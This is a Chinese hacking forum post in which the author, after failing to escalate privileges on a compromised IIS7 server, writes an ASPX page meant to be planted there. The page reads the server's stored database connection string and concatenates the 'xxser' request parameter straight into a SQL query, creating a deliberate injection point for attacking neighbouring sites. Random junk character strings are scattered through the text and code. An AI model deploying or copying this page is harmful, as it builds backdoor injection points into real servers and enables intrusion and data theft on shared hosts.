利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
* {% B+ ^/ a: _3 {( @代码量不多，自己写个拉倒了。烦死了。

( A. O! F2 [5 B, K( n* Y​
+ M9 \# N% v6 c<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
" ?4 j7 V& M! i8 z3 b8 c2 |1 T<body>
    <form id="form1" runat="server">
    <div>
     <script language="c#" runat="server">
2 P" S2 ~- O! c/ ^, U9 p/ E            
3 X' Q1 E( ]2 y% m$ v5 A; B6 d         void page_init(object sender, EventArgs e)
         {
) O$ f; h* C5 }6 [            
& I8 P7 ^( G7 [) t0 X9 K3 }             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
             conn.Open();
            
+ I% H! d! b8 C2 W, c             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
$ J4 n, G6 L& w- ]7 m* I            
             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
  g  {% [7 o3 G4 _3 b0 Z             int x = command.ExecuteNonQuery();
             Response.Write(i+"\n");
             Response.Write(x);
6 ]( ^9 t6 M7 \, U1 K7 B6 v3 x             conn.Close();
         }
     
  </script>
    </div>
    </form>
/ p" h8 s# S" j/ N</body>
% T9 O; u0 I8 h% H9 G/ W8 W/ s+ z</html>